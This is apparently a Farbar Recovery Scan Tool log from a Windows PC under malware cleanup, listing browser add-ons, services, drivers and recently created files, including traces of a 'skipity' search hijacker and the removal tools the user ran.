BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO-x32: No Name - {5C255C8A-E604-49b4-9D64-90988571CECB} -  No File
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKCU - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A8B01E69-7297-4C38-B3E3-40775DDD3E9E}: [NameServer]213.94.78.17 213.94.78.16

FireFox:
========
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default
FF Homepage: hxxp://www.starobserver.org|hxxp://news.astronomie.info/
FF Keyword.URL: hxxp://search.skipity.com/?source=ab&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @t-immersion.com/DFusionHomeWebPlugIn - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\s-amazon.xml
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\skipity-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\googledesktop.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: German Dictionary - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\de-DE@dictionaries.addons.mozilla.org [2012-10-14]
FF Extension: Print pages to PDF - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\printPages2Pdf@reinhold.ripper [2013-11-12]
FF Extension: WOT - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2013-11-28]
FF Extension: Firebug - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\firebug@software.joehewitt.com.xpi [2013-09-23]
FF Extension: Write Area - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\writearea@writearea.com.xpi [2012-10-22]
FF Extension: Web Developer - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2012-08-15]
FF Extension: Adblock Plus - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-10-19]
FF Extension: Anti-Banner - C:\Program Files (x86)\Mozilla Firefox\extensions\KavAntiBanner@kaspersky.ru_bak [2013-12-12]
FF Extension: Modul zur Link-Untersuchung - C:\Program Files (x86)\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak [2013-12-12]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2013-12-12]
FF HKLM-x32\...\Firefox\Extensions: [virtualKeyboard@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\virtualKeyboard@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [KavAntiBanner@Kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\KavAntiBanner@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [linkfilter@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\linkfilter@kaspersky.ru

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (2007 Microsoft Office system) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 7 U17) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (D'Fusion @Home Web Plug-In (3.20.20164)) - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\u00AE Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_169.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.170.2) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Extension: (Google Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0 [2013-10-11]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0 [2013-10-11]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0 [2013-10-11]
CHR Extension: (Google Search) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0 [2013-10-11]
CHR Extension: (Chrome In-App Payments service) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0 [2013-10-11]
CHR Extension: (Gmail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0 [2013-04-19]

==================== Services (Whitelisted) =================

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2010-12-18] (Adobe Systems)
R2 Adobe Version Cue CS2; C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe [163840 2005-04-06] (Adobe Systems Incorporated)
R2 arXfrSvc; C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe [231280 2011-01-10] (Microsoft Corporation)
R2 avmike; C:\Program Files\FRITZ!Fernzugang\avmike.exe [335224 2010-03-30] (AVM Berlin)
R2 certsrv; C:\Program Files\FRITZ!Fernzugang\certsrv.exe [143224 2010-03-30] (AVM Berlin)
R2 dgdersvc; C:\Windows\SysWOW64\dgdersvc.exe [95568 2010-05-13] (Devguru Co., Ltd.)
R2 esClient; C:\Program Files\Windows Home Server\esClient.exe [109936 2011-01-10] (Microsoft Corporation)
R2 FirebirdGuardianHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe [1265664 2011-01-17] ()
R3 FirebirdServerHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe [3735552 2011-01-17] (Firebird Project)
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\MAGIX\Common\Database\bin\fbserver.exe [1527900 2005-11-17] (MAGIX®)
S3 GoogleDesktopManager-051210-111108; C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
R2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577024 2012-03-24] (Hauppauge Computer Works)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] ()
S3 KiesAllShare; C:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe [9241088 2010-05-13] ()
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2010-12-19] ()
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-10-23] (Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (Egis Technology Inc.)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [348376 2013-10-23] (Microsoft Corporation)
R2 nwtsrv; C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe [189304 2010-03-30] (AVM Berlin)
R2 TryAndDecideService; C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [498872 2007-08-31] ()
R2 USBS3S4Detection; C:\OEM\USBDECTION\USBS3S4Detection.exe [76320 2009-12-09] ()
R2 WHSConnector; C:\Program Files\Windows Home Server\WHSConnector.exe [489840 2011-01-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 dgderdrv; C:\Windows\System32\drivers\dgderdrv.sys [20568 2010-05-13] (Devguru Co., Ltd)
R3 dgderdrv; C:\Windows\SysWOW64\drivers\dgderdrv.sys [18136 2010-05-13] (Devguru Co., Ltd)
S3 hcw17bda; C:\Windows\System32\drivers\hcw17bda.sys [67456 2010-01-27] (Hauppauge Computer Works, Inc.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [242688 2012-12-22] (Huawei Technologies Co., Ltd.)
S4 Iaaidassi; No ImagePath
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [248240 2013-09-27] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [134944 2013-09-27] (Microsoft Corporation)
R3 NWIM; C:\Windows\System32\DRIVERS\avmnwim.sys [412024 2010-03-30] (AVM Berlin)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-08-06] ()
R1 UimBus; C:\Windows\System32\DRIVERS\uimx64.sys [59184 2011-11-17] (Windows (R) 2000 DDK provider)
R1 Uim_IM; C:\Windows\System32\Drivers\Uim_IMx64.sys [572336 2011-11-17] (Paragon)
R1 Uim_VIM; C:\Windows\System32\Drivers\uim_vimx64.sys [352816 2011-11-17] (Paragon)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2010-07-27] (Huawei Technologies Co., Ltd.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 10:47 - 2014-01-15 11:04 - 00000000 ____D C:\AdwCleaner
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 10:35 - 2014-01-15 10:35 - 01236282 _____ C:\Users\*****\Downloads\adwcleaner.exe
2014-01-15 10:35 - 2014-01-15 10:35 - 01037068 _____ (Thisisu) C:\Users\*****\Downloads\JRT.exe
2014-01-15 10:34 - 2014-01-15 10:34 - 00448512 _____ (OldTimer Tools) C:\Users\*****\Downloads\TFC.exe
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 09:05 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-15 09:04 - 2014-01-15 09:05 - 10285040 _____ (Malwarebytes Corporation                                    ) C:\Users\*****\Downloads\mbam-setup-1.75.0.1300.exe
2014-01-15 08:45 - 2014-01-15 08:46 - 00377856 _____ C:\Users\*****\Downloads\gmer_2.1.19163.exe
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:43 - 2014-01-15 08:44 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:40 - 2014-01-14 18:50 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:28 - 2014-01-14 18:35 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:26 - 2014-01-14 18:54 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:15 - 2014-01-14 18:38 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:03 - 2014-01-14 11:04 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:32 - 2014-01-11 20:33 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2004-03-09 00:00 - 00662288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSCOMCT2.OCX
2014-01-08 11:15 - 1998-07-06 00:00 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPIDE.DLL
2014-01-08 11:15 - 1998-06-24 00:00 - 00137000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMAPI32.OCX
2014-01-08 11:13 - 2014-01-08 11:15 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:11 - 2013-12-30 20:16 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:54 - 2013-12-30 08:58 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:22 - 2013-12-29 11:24 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:56 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-28 11:55 - 2013-06-06 13:00 - 03748792 ____N (mquadr.at software engineering und consulting GmbH) C:\Windows\SysWOW64\M2ElevatedCalls.dll
2013-12-28 11:55 - 2012-12-22 09:46 - 00014976 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00242688 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00076800 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2013-12-28 11:55 - 2012-12-03 18:40 - 00452608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2013-12-28 11:55 - 2012-12-03 14:57 - 00238592 ____N (Nicomsoft Ltd.) C:\Windows\SysWOW64\WiFiMan.dll
